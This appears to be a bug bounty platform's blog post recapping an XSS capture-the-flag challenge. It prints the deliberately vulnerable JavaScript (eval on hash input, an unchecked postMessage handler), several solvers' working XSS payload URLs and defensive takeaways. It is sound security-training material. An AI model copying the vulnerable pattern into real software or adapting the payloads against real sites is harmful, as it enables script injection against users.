The XSS challenge that +100k people saw but only 90 solved

By Intigriti

May 6, 2019

The Intigriti Ethical Hacker Insights Report 2021 educates on how to counter cybersecurity weaknesses

CHALLENGE: Can you find the XSS? šŸ§ Earn a Burp License, cool swag & private invites! šŸ‘‰https://t.co/EehqBfFmjA pic.twitter.com/sq8FIYgQOH

ā€” Intigriti (@intigriti) April 29, 2019

A couple of days ago we released a XSS challenge. A few hours after sending out the tweet, we noticed the success of this. Therefore, we decided to share a blogpost with the lovely community.

<a href="https://poll.fm/10311886" target="_blank" rel="noopener noreferrer">Take Our Poll</a>

For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case itā€™s not available anymore or you want to host the challenge yourself, you can find the code below.

  
  const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|/gi, "forbidden");
  const iframe = document.createElement("iframe"); iframe.src = url; document.body.appendChild(iframe);
  iframe.onload = function(){ window.addEventListener("message", executeCtx, false);}
  function executeCtx(e) {
    if(e.source == iframe.contentWindow){
      e.data.location = window.location;
      Object.assign(window, e.data);
      eval(url);
    }
  }

Solution

We could write an in detail explanation on how to solve this challenge, but we couldnā€™t do a better job than Dominic and dPhoeniixx. Both researchers shared a well written and very detailed blogpost. You can find the link below.

Solution of Dominic

The @intigriti XSS Challenge is over! Here's a writeup I did explaining my solution and how I got there! https://t.co/075tIcIb39 ā€¦ Thanks for the super fun challenge! pic.twitter.com/OnpTM35tne

ā€” Dominic (@dee__see) May 3, 2019

Solution of DPhoenixx

Wondering how this challenge could be solved via a different way? Take a look at the payloads shared below.

https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==

by n0tm3

https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E

by Karel_Origin

https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11

by terjanq

https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e

by daudmalik06

https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E

by _zulln

One of the most common mistakes we saw was people executing the alert box inside the iframe. But that is not valid solution because the javascript doesnā€™t get triggered on challenge.intigriti.io but in the iframe itself (domain = null).

Overview of the tips

The four tips shared during the challenge:

First tip: ā€œItā€™s all about that base, ā€™bout that baseā€.

Second tip: ā€œDefine the undefinedā€.

Third tip: ā€œYou donā€™t need any external resources.ā€

Forth tip: ā€œLook for the charset.ā€

Key takeaways

  • Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger tool built-in your browser.

  • Do not trust user input. Input validation is the key!

  • Seeing a message event? Make sure you check the origin?

  • Avoid the usage of eval().

  • Do not give up. Patience is key.

Thank you!

A special thanks to @filedescriptor and @edoverflow for hardening our challenge!

Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.

The XSS Challenge is over! Thank you all for participating. We had a whopping 90 valid submissions but there can only be one winner. Check the video below to discover who's getting a Burp Pro License and an exclusive @intigriti swag package! #HackWithIntigriti #CTF #BugBounty pic.twitter.com/l2tNzYwJGB

ā€” Intigriti (@intigriti) May 3, 2019

Want more?

Follow us on twitter and donā€™t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.

You may also like